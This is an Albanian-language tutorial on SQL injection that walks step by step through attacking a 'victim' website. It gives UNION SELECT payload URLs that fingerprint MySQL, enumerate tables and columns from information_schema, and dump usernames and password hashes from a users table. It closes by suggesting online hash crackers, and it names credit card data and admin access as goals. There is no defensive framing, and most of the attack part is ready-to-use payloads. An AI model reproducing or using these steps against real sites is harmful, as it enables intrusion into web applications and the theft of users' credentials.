1.SQL-injetion-Tutorial
1.1 Cfar është SQL-injetion?
1.2 Provo faqen nese eshte vulnerability
1.3 Si të zbulojmë sa numra të kolumnave ka
1.4 Provo për UNION SELECT funksionin
1.5 Si të zbulojmë versionin e MYSQL-së
1.6 Si të zbulojmë Table_name
1.7 Si të zbulojmë Column_name
============================
1.1 Cfare është SQL-injetion?
============================
SQL-injetion është një ndër metodat më të përdorura ditët e sotme për të marrë hack në ndonjë webfaqe.
Kjo metodë i jep leje sulmuesit që të sulmon përmes URL-së.
Me këtë metodë sulmuesi ka mundësi të marrë informata të ndryshme nga MYSQL-së,
(username,passwords), logins të ndryshëm,
akses nëpër faqe të administrimit, CC etj...
====================================
1.2 Provo faqen nese eshte vulnerability
====================================
Marrim nje website:
----------------------------------
http://www.site.com/vesti.php?id=1
----------------------------------
Tani që të testojm se a është faqa vulnerability, shkojmë dhe ja shtojmë ' pra presjen lart, e cila
do të duket kështu:
http://www.site.com/vesti.php?id=1'
Pra pas këtij veprimi, nëse na jepë ndonjë error si prsh:
"You have an error in your SQL syntax;" ose "Warning: mysql_result() [function.mysql-result]:"
Me këtë do te thot se faqja është vulnerability.
================================================== ===
1.3 Si të zbulojmë sa numra të kolumnave ka
================================================== ===
Për të gjetur sa Kolumna kemi, përdorim: ORDER BY
Pra (order by) do të na ndihmon të gjejmë sa kolumna kemi në faqen e viktimës, shkojmë në shëmbull:
http://www.site.com/vesti.php?id=1 order by 1-- <--> Hapet faqja normal pra nuk na jep Error
http://www.site.com/vesti.php?id=1 order by 2-- <--> Hapet faqja normal pra nuk na jep Error
http://www.site.com/vesti.php?id=1 order by 3-- <--> Hapet faqja normal pra nuk na jep Error
http://www.site.com/vesti.php?id=1 order by 4-- <--> Hapet faqja normal pra nuk na jep Error
http://www.site.com/vesti.php?id=1 order by 5-- <--> Error page - Pra këtu kemi Error
Me këtë shohim se tek kjo faqe kemi 4 Kolumna, pra e heqim (5) numrin e fundit i cili jep error!
e lejmë kështu: http://www.site.com/vesti.php?id=1 order by 4--
=======================================
1.4 Provo për UNION SELECT funksionin
=======================================
Pra tani do të provojmë që të nxjerim numrat e kolumnave dhe të dhënat të tjera në dritare, përmes (Union
select).
Nëse kemi 4 numra të kolumnave në shembull, do të dukej dicka e tillë:
http://www.site.com/vesti.php?id=1 union select 1,2,3,4--
Nëse në faqe na shfaqet ndonjëri prej numrave prej 1-4 atëherë është mirë funksionon gjithçka në rregull por
në qoft se jo
shtojini nji - (minus) përpara tek (1)
shembull:
http://www.site.com/vesti.php?id=-1 union select 1,2,3,4--
Tani duhet të shfaqet ndonjëri prej 4 numrave prej 1-4.
Nëse shfaqet ndonjëri prej këtyre numrave atëhere gjithcka është në rregull!
=========================================
1.5 Si të zbulojmë versionin e MYSQL-së
=========================================
Si të zbulojmë verzionin e mysql-së është lehtë, këte mundemi të bëjmë duke zevendesuar numrin e kolumnës
me këtë (@@version).
Më pas duhet të na shfaqet se cfarë verzioni është prezent në faqen e viktimës.
Të themi se numri i cili shfaqet është (3) për të treguar më qart do ju tregoj me shëmbullin më poshtë:
http://www.site.com/vesti.php?id=-1 union select 1,2,@@version,4--
Dhe tani do të na shfaqet versioni.
===============================
1.6 Si të zbulojmë Table_name
===============================
http://www.site.com/vesti.php?id=-1 union select 1,2,group_concat(table_name),4 from
information_schema.tables where table_schema=database()--
Dhe Tani do të na shfaqet emri tabelës prsh: (users).
================================
1.7 Si të zbulojmë Column_name
================================
E njëjta gjë vlen edhe per gjetjen e kolumnave(column_name) sikur tek table_name!
Në vënd ku shkruan
(table_name) & tables duhet vendosur (column_name) & columns.
Shkojmë të shfaqim edhe këtë shëmbull:
http://www.site.com/vesti.php?id=-1 union select 1,2,group_concat(column_name),4 from
information_schema.columns where table_schema=database()--
Të themi që column_name janë (username, password).
Ja kështu duhet vepruar që të na shfaqet (Username, Passwordi ose Hashi):
http://www.site.com/vesti.php?id=-1 union select 1,2,group_concat(username,0x3a,password,),4 from
users--
Dhe tani na shfaqen (Username, Passwordi ose Hashi)
nëse del (hashi) këtu mundë te shkruani ne google: hash cracker....dhe do ju dalin shum webe qe crackojn
hashe.....
